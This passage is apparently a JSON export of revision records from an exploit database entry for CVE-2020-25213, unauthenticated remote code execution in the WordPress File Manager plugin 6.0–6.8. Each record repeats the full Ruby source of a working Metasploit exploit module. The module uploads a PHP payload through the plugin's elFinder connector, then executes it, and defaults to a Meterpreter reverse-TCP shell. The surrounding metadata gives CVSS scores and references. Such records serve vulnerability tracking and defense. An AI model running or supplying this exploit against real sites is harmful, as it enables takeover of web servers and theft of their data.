["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-22T08:42:01", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-22T08:42:01", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-24] #", "category": "", "verified": false}, "lastseen": "2021-10-24T00:17:36", "differentElements": ["sourceData"], "edition": 50}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "8c4da010ecf4d4b0148014a2a15b2351", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-25T00:16:18", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-25T00:16:18", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-25T00:16:18", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-25] #", "category": "", "verified": false}, "lastseen": "2021-10-25T00:16:18", "differentElements": ["sourceData"], "edition": 51}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "697b294f1989759f4e3f78c98f7be643", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-26T20:14:29", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-25T00:16:18", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-25T00:16:18", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-26] #", "category": "", "verified": false}, "lastseen": "2021-10-26T20:14:29", "differentElements": ["sourceData"], "edition": 52}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "d11e7177d40e36a7bbf3e1b280a53b7d", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-26T22:22:10", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-26T22:22:10", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-26T22:22:10", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-27] #", "category": "", "verified": false}, "lastseen": "2021-10-26T22:22:10", "differentElements": ["sourceData"], "edition": 53}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "b65856dd0e0263ac4045f48491591358", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 